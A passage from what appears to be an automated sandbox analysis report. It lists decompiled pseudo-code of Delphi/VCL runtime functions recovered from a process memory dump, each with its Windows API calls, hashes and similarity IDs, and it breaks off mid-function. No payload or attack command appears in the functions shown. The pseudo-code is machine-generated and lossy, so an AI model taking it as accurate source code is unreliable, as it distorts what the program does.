                                                                        • Opcode ID: 5a7f43292a819dc966d5a9846035b269f477fe0f4055a0f3a77478acf61808e0
                                                                        • Instruction ID: 0c7870d5d9d24088c3abd12cb0ef2774cc45ea1f721d3d528cff2115086cf705
                                                                        • Opcode Fuzzy Hash: 5a7f43292a819dc966d5a9846035b269f477fe0f4055a0f3a77478acf61808e0
                                                                        • Instruction Fuzzy Hash: 1B1177713002016BD511BA7A8D85A6BB79DDF45345B08056AFD48DB343CB2DEC0697AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00422948(int __eax, intOrPtr __ecx, void* __edx) {
                                                                        				struct tagRECT _v32;
                                                                        				int _t11;
                                                                        				int _t29;
                                                                        				void* _t33;
                                                                        				void* _t35;
                                                                        				struct HPALETTE__* _t36;
                                                                        				void* _t38;
                                                                        				struct HPALETTE__* _t39;
                                                                        
                                                                        				_t11 = __eax;
                                                                        				_v32.bottom = __ecx;
                                                                        				_t33 = __edx;
                                                                        				_t29 = __eax;
                                                                        				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
                                                                        					_t36 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                        					_t39 = 0;
                                                                        					if(_t36 != 0) {
                                                                        						_t39 = SelectPalette(E00420730(__edx), _t36, 0xffffffff);
                                                                        						RealizePalette(E00420730(_t33));
                                                                        					}
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					_t35 = _t33;
                                                                        					_t38 = _t36;
                                                                        					_v32.right = _v32.right - 1;
                                                                        					_v32.bottom = _v32.bottom - 1;
                                                                        					_t11 = PlayEnhMetaFile(E00420730(_t35),  *( *((intOrPtr*)(_t29 + 0x28)) + 8),  &_v32);
                                                                        					if(_t38 != 0) {
                                                                        						return SelectPalette(E00420730(_t35), _t39, 0xffffffff);
                                                                        					}
                                                                        				}
                                                                        				return _t11;
                                                                        			}












                                                                        APIs
                                                                        • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422976
                                                                        • RealizePalette.GDI32(00000000), ref: 00422985
                                                                        • PlayEnhMetaFile.GDI32(00000000,?,?), ref: 004229B7
                                                                        • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 004229CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Palette$Select$FileMetaPlayRealize
                                                                        • String ID:
                                                                        • API String ID: 1995988871-0
                                                                        • Opcode ID: 7875b06541b9173ceedcf1f29655bc06f0622a56d0d5ab255043b0cd6fadb081
                                                                        • Instruction ID: 088bed5f8542f6c822edce03a29eb1a8d7af9251e81d94029e29098bb0995351
                                                                        • Opcode Fuzzy Hash: 7875b06541b9173ceedcf1f29655bc06f0622a56d0d5ab255043b0cd6fadb081
                                                                        • Instruction Fuzzy Hash: 7301A5717082206BC210BB699C8495BB3DDDF85320F06063BB858EB382D679EC40DAD9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004555D8(void* __eax, void* __ecx, char __edx) {
                                                                        				char _v12;
                                                                        				struct HWND__* _v20;
                                                                        				int _t17;
                                                                        				void* _t27;
                                                                        				struct HWND__* _t33;
                                                                        				void* _t35;
                                                                        				void* _t36;
                                                                        				long _t37;
                                                                        
                                                                        				_t37 = _t36 + 0xfffffff8;
                                                                        				_t27 = __eax;
                                                                        				_t17 =  *0x496c04; // 0x2170d40
                                                                        				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                                                        					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                                                        						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                                                        						_v12 = __edx;
                                                                        						EnumWindows(E00455568, _t37);
                                                                        						_t5 = _t27 + 0x90; // 0x0
                                                                        						_t17 =  *_t5;
                                                                        						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                                                        							_t33 = GetWindow(_v20, 3);
                                                                        							_v20 = _t33;
                                                                        							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                                                        								_v20 = 0xfffffffe;
                                                                        							}
                                                                        							_t10 = _t27 + 0x90; // 0x0
                                                                        							_t17 =  *_t10;
                                                                        							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                                                        							if(_t35 >= 0) {
                                                                        								do {
                                                                        									_t13 = _t27 + 0x90; // 0x0
                                                                        									_t17 = SetWindowPos(E00414208( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                                                                        									_t35 = _t35 - 1;
                                                                        								} while (_t35 != 0xffffffff);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                                                        				}
                                                                        				return _t17;
                                                                        			}

                                                                        APIs
                                                                        • EnumWindows.USER32(00455568), ref: 0045560D
                                                                        • GetWindow.USER32(00000003,00000003), ref: 00455625
                                                                        • GetWindowLongA.USER32 ref: 00455632
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00455671
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$EnumLongWindows
                                                                        • String ID:
                                                                        • API String ID: 4191631535-0
                                                                        • Opcode ID: 059f7337a3b95d907635159adef8cbabbda6ccd3a0e79a6ce7d253a1261b5fdf
                                                                        • Instruction ID: 2c8fcb29ad70036d63b1f57068b34d5d0e3d2e3afda160b4fc5bec8406b8bc50
                                                                        • Opcode Fuzzy Hash: 059f7337a3b95d907635159adef8cbabbda6ccd3a0e79a6ce7d253a1261b5fdf
                                                                        • Instruction Fuzzy Hash: 94115170604650AFDB10AB2CCC95FA673D8EB04725F55017AFD98AB2D3C3749C44C799
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00417214(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                                                        				CHAR* _v8;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t18;
                                                                        				void* _t23;
                                                                        				CHAR* _t24;
                                                                        				void* _t25;
                                                                        				struct HRSRC__* _t29;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t31;
                                                                        				void* _t32;
                                                                        
                                                                        				_v8 = _t24;
                                                                        				_t31 = __edx;
                                                                        				_t23 = __eax;
                                                                        				_t29 = FindResourceA(__edx, _v8, _a4);
                                                                        				 *(_t23 + 0x10) = _t29;
                                                                        				_t33 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					E004171A4(_t23, _t24, _t29, _t31, _t33, _t32);
                                                                        					_pop(_t24);
                                                                        				}
                                                                        				_t5 = _t23 + 0x10; // 0x416fb4
                                                                        				_t30 = LoadResource(_t31,  *_t5);
                                                                        				 *(_t23 + 0x14) = _t30;
                                                                        				_t34 = _t30;
                                                                        				if(_t30 == 0) {
                                                                        					E004171A4(_t23, _t24, _t30, _t31, _t34, _t32);
                                                                        				}
                                                                        				_t7 = _t23 + 0x10; // 0x416fb4
                                                                        				_push(SizeofResource(_t31,  *_t7));
                                                                        				_t8 = _t23 + 0x14; // 0x416ad4
                                                                        				_t18 = LockResource( *_t8);
                                                                        				_pop(_t25);
                                                                        				return E00416F74(_t23, _t25, _t18);
                                                                        			}

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 0041722B
                                                                        • LoadResource.KERNEL32(?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 00417245
                                                                        • SizeofResource.KERNEL32(?,00416FB4,?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 0041725F
                                                                        • LockResource.KERNEL32(00416AD4,00000000,?,00416FB4,?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 00417269
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 3473537107-0
                                                                        • Opcode ID: 005317863e8cff03af0266735c1d7592115360119c5bcdfeb6093ed02da14767
                                                                        • Instruction ID: 3290e5c036addd08ea02881163b77e979cd31cb4f03c08ba38f160ae1e3d6bef
                                                                        • Opcode Fuzzy Hash: 005317863e8cff03af0266735c1d7592115360119c5bcdfeb6093ed02da14767
                                                                        • Instruction Fuzzy Hash: F9F04BB26052046F9704EE5EA881D9B77ECEE89364311416AF909D7202DA39ED518768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040161C(void* __eax, void** __ecx, void* __edx) {
                                                                        				void* _t4;
                                                                        				void** _t9;
                                                                        				void* _t13;
                                                                        				void* _t14;
                                                                        				long _t16;
                                                                        				void* _t17;
                                                                        
                                                                        				_t9 = __ecx;
                                                                        				_t14 = __edx;
                                                                        				_t17 = __eax;
                                                                        				 *(__ecx + 4) = 0x100000;
                                                                        				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
                                                                        				_t13 = _t4;
                                                                        				 *_t9 = _t13;
                                                                        				if(_t13 == 0) {
                                                                        					_t16 = _t14 + 0x0000ffff & 0xffff0000;
                                                                        					_t9[1] = _t16;
                                                                        					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
                                                                        					 *_t9 = _t4;
                                                                        				}
                                                                        				if( *_t9 != 0) {
                                                                        					_t4 = E0040146C(0x4965e4, _t9);
                                                                        					if(_t4 == 0) {
                                                                        						VirtualFree( *_t9, 0, 0x8000);
                                                                        						 *_t9 = 0;
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        				return _t4;
                                                                        			}

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,|8~,?,?,?,00401988), ref: 0040163A
                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,|8~,?,?,?,00401988), ref: 0040165F
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,|8~,?,?,?,00401988), ref: 00401685
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$Free
                                                                        • String ID: |8~
                                                                        • API String ID: 3668210933-42510566
                                                                        • Opcode ID: 1701d776f782e39904b3b8996ef739fa462f12b6b9d7e1a0b955536b087e05e2
                                                                        • Instruction ID: 1e69f5fe43a740ff0071c7d4e860f39ca71c7f1fffdc7dfabefd4915b5c75808
                                                                        • Opcode Fuzzy Hash: 1701d776f782e39904b3b8996ef739fa462f12b6b9d7e1a0b955536b087e05e2
                                                                        • Instruction Fuzzy Hash: 92F0C8B27403106BEB319A694CC5F433AD89B45754F154176BE08FF3DAD6795800C66D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408954(WORD* __eax) {
                                                                        				struct _FILETIME _v12;
                                                                        				long _t20;
                                                                        				WORD* _t30;
                                                                        				void* _t35;
                                                                        				struct _FILETIME* _t36;
                                                                        
                                                                        				_t36 = _t35 + 0xfffffff8;
                                                                        				_t30 = __eax;
                                                                        				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
                                                                        					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						_t20 = GetLastError();
                                                                        					}
                                                                        					L5:
                                                                        					return _t20;
                                                                        				}
                                                                        				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
                                                                        				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
                                                                        				_t30[2] = _t30[0x1c];
                                                                        				_t30[4] = _t30[0xc].dwFileAttributes;
                                                                        				E004045B0( &(_t30[6]), 0x104,  &(_t30[0x22]));
                                                                        				_t20 = 0;
                                                                        				goto L5;
                                                                        			}

                                                                        APIs
                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00408964
                                                                        • GetLastError.KERNEL32(?,?), ref: 0040896D
                                                                        • FileTimeToLocalFileTime.KERNEL32(?), ref: 00408981
                                                                        • FileTimeToDosDateTime.KERNEL32 ref: 00408990
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileTime$DateErrorFindLastLocalNext
                                                                        • String ID:
                                                                        • API String ID: 2103556486-0
                                                                        • Opcode ID: f4b683beff1fc4ac594b1e258cc49dcaf875b64362cef98da73fec0dfe3fedf2
                                                                        • Instruction ID: 56775c696c456fa3967af653f38531e12ac447ffae477507b2a71b5a2badd77f
                                                                        • Opcode Fuzzy Hash: f4b683beff1fc4ac594b1e258cc49dcaf875b64362cef98da73fec0dfe3fedf2
                                                                        • Instruction Fuzzy Hash: B2F012B25052019FCB44FF64C9C289737DC9B4431471085B7AD45DB287E638D558C7A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00454EF4(void* __ecx) {
                                                                        				void* _t2;
                                                                        				DWORD* _t7;
                                                                        
                                                                        				_t2 =  *0x496c04; // 0x2170d40
                                                                        				if( *((char*)(_t2 + 0xa5)) == 0) {
                                                                        					if( *0x496c1c == 0) {
                                                                        						_t2 = SetWindowsHookExA(3, E00454EB0, 0, GetCurrentThreadId());
                                                                        						 *0x496c1c = _t2;
                                                                        					}
                                                                        					if( *0x496c18 == 0) {
                                                                        						_t2 = CreateEventA(0, 0, 0, 0);
                                                                        						 *0x496c18 = _t2;
                                                                        					}
                                                                        					if( *0x496c20 == 0) {
                                                                        						_t2 = CreateThread(0, 0x3e8, E00454E54, 0, 0, _t7);
                                                                        						 *0x496c20 = _t2;
                                                                        					}
                                                                        				}
                                                                        				return _t2;
                                                                        			}






                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454F0C
                                                                        • SetWindowsHookExA.USER32 ref: 00454F1C
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00457722,?,?,02170D40,?,?,00457150,?), ref: 00454F37
                                                                        • CreateThread.KERNEL32(00000000,000003E8,00454E54,00000000,00000000), ref: 00454F5B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateThread$CurrentEventHookWindows
                                                                        • String ID:
                                                                        • API String ID: 1195359707-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401414() {
                                                                        				intOrPtr* _t4;
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr* _t9;
                                                                        				intOrPtr* _t12;
                                                                        				void* _t14;
                                                                        
                                                                        				if( *0x4965e0 != 0) {
                                                                        					L5:
                                                                        					_t4 =  *0x4965e0;
                                                                        					 *0x4965e0 =  *_t4;
                                                                        					return _t4;
                                                                        				} else {
                                                                        					_t12 = LocalAlloc(0, 0x644);
                                                                        					if(_t12 != 0) {
                                                                        						_t6 =  *0x4965dc; // 0x7e3258
                                                                        						 *_t12 = _t6;
                                                                        						 *0x4965dc = _t12;
                                                                        						_t14 = 0;
                                                                        						do {
                                                                        							_t2 = (_t14 + _t14) * 8; // 0x4
                                                                        							_t9 = _t12 + _t2 + 4;
                                                                        							 *_t9 =  *0x4965e0;
                                                                        							 *0x4965e0 = _t9;
                                                                        							_t14 = _t14 + 1;
                                                                        						} while (_t14 != 0x64);
                                                                        						goto L5;
                                                                        					} else {
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        			}









                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000000,00000644,?,|8~,00401477,?,?,00401517,?,?,?,?,?,00401A57), ref: 00401427
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AllocLocal
                                                                        • String ID: X2~$\8~$|8~
                                                                        • API String ID: 3494564517-411482707
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 49%
                                                                        			E00423FFC(void* __eflags) {
                                                                        				int _t14;
                                                                        				intOrPtr _t20;
                                                                        				void* _t21;
                                                                        
                                                                        				DeleteObject( *(_t21 - 0x10));
                                                                        				E00403DD0();
                                                                        				E00403E24();
                                                                        				_pop(_t20);
                                                                        				 *[fs:eax] = _t20;
                                                                        				_push(0x42404d);
                                                                        				DeleteDC( *(_t21 - 0x1c));
                                                                        				_t14 = ReleaseDC(0,  *(_t21 - 0x18));
                                                                        				if( *(_t21 - 0x10) != 0) {
                                                                        					return GetObjectA( *(_t21 - 0x10), 0x54,  *(_t21 + 0xc));
                                                                        				}
                                                                        				return _t14;
                                                                        			}







                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: DeleteObject$Release
                                                                        • String ID:
                                                                        • API String ID: 2600533906-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004072D8(void* __eax, int __ecx, long __edx) {
                                                                        				void* _t2;
                                                                        				void* _t4;
                                                                        
                                                                        				_t2 = GlobalHandle(__eax);
                                                                        				GlobalUnWire(_t2);
                                                                        				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                                                        				GlobalFix(_t4);
                                                                        				return _t4;
                                                                        			}






                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Global$AllocHandleWire
                                                                        • String ID:
                                                                        • API String ID: 2210401237-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E004348FC(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr* _v12;
                                                                        				struct tagPOINT _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				char _v36;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t54;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t71;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr _t88;
                                                                        				intOrPtr _t105;
                                                                        				intOrPtr _t115;
                                                                        				intOrPtr _t116;
                                                                        				intOrPtr _t120;
                                                                        				intOrPtr _t123;
                                                                        				intOrPtr _t124;
                                                                        				intOrPtr _t129;
                                                                        				void* _t133;
                                                                        				intOrPtr _t134;
                                                                        				void* _t137;
                                                                        
                                                                        				_t137 = __fp0;
                                                                        				_v8 = __ecx;
                                                                        				_t88 = __edx;
                                                                        				_t124 = __eax;
                                                                        				 *0x496b88 = __eax;
                                                                        				_push(_t133);
                                                                        				_push(0x434aa1);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t134;
                                                                        				_v12 = 0;
                                                                        				 *0x496b90 = 0;
                                                                        				_t135 =  *((char*)(__eax + 0x9b));
                                                                        				if( *((char*)(__eax + 0x9b)) != 0) {
                                                                        					E004037D8(__eax, __eflags);
                                                                        					__eflags =  *0x496b88;
                                                                        					if( *0x496b88 != 0) {
                                                                        						__eflags = _v12;
                                                                        						if(_v12 == 0) {
                                                                        							_v12 = E00433CD8(1, _t124);
                                                                        							 *0x496b90 = 1;
                                                                        						}
                                                                        						_t128 =  *((intOrPtr*)(_v12 + 0x38));
                                                                        						_t105 =  *0x4323f0; // 0x43243c
                                                                        						_t54 = E00403768( *((intOrPtr*)(_v12 + 0x38)), _t105);
                                                                        						__eflags = _t54;
                                                                        						if(_t54 == 0) {
                                                                        							_t129 =  *((intOrPtr*)(_v12 + 0x38));
                                                                        							__eflags =  *((intOrPtr*)(_t129 + 0x30));
                                                                        							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
                                                                        								L14:
                                                                        								__eflags = 0;
                                                                        								E00412BA4(0,  &_v36, 0, _t124, _t129);
                                                                        								E004360C4(_t129,  &_v28,  &_v36);
                                                                        								_t60 = _v12;
                                                                        								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
                                                                        								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
                                                                        								L15:
                                                                        								_t130 = _v12;
                                                                        								_t125 =  *((intOrPtr*)(_v12 + 0x38));
                                                                        								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
                                                                        								E00412BA4( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
                                                                        								_t65 = _v12;
                                                                        								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
                                                                        								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
                                                                        								goto L16;
                                                                        							}
                                                                        							_t116 =  *0x4323f0; // 0x43243c
                                                                        							_t71 = E00403768(_t129, _t116);
                                                                        							__eflags = _t71;
                                                                        							if(_t71 != 0) {
                                                                        								goto L14;
                                                                        							}
                                                                        							GetCursorPos( &_v20);
                                                                        							_t74 = _v12;
                                                                        							 *(_t74 + 0x44) = _v20.x;
                                                                        							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
                                                                        							goto L15;
                                                                        						} else {
                                                                        							GetWindowRect(E0043CC2C(_t128), _v12 + 0x44);
                                                                        							L16:
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							L17:
                                                                        							E0043478C(_v12, _v8, _t88, _t133, _t137);
                                                                        							_pop(_t115);
                                                                        							 *[fs:eax] = _t115;
                                                                        							return 0;
                                                                        						}
                                                                        					}
                                                                        					_pop(_t120);
                                                                        					 *[fs:eax] = _t120;
                                                                        					return 0;
                                                                        				}
                                                                        				E004037D8(__eax, _t135);
                                                                        				if( *0x496b88 != 0) {
                                                                        					__eflags = _v12;
                                                                        					if(_v12 == 0) {
                                                                        						_v12 = E00433BC0(_t124, 1);
                                                                        						 *0x496b90 = 1;
                                                                        					}
                                                                        					goto L17;
                                                                        				}
                                                                        				_pop(_t123);
                                                                        				 *[fs:eax] = _t123;
                                                                        				return 0;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <$C
                                                                        • API String ID: 0-3423417450
                                                                        • Opcode ID: fc7312295d466d1b6c2efc2a349e4abf85d9fbfa0e8825b772108cf843e98e7d
                                                                        • Instruction ID: c90d3436bb83f37f3896d1cde7c7445814aa3cbfde0b1555d2802c3bcb8cf98a
                                                                        • Opcode Fuzzy Hash: fc7312295d466d1b6c2efc2a349e4abf85d9fbfa0e8825b772108cf843e98e7d
                                                                        • Instruction Fuzzy Hash: 62517E74A042059FCB00DF69D841ADEBBF5FF98328F1190AAE804A7361D779B985CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E0041F478(void* __eax, void* __ebx, void* __ecx) {
                                                                        				signed int _v8;
                                                                        				struct tagLOGFONTA _v68;
                                                                        				char _v72;
                                                                        				char _v76;
                                                                        				char _v80;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t81;
                                                                        				void* _t107;
                                                                        				void* _t116;
                                                                        				intOrPtr _t126;
                                                                        				void* _t137;
                                                                        				void* _t138;
                                                                        				intOrPtr _t139;
                                                                        
                                                                        				_t137 = _t138;
                                                                        				_t139 = _t138 + 0xffffffb4;
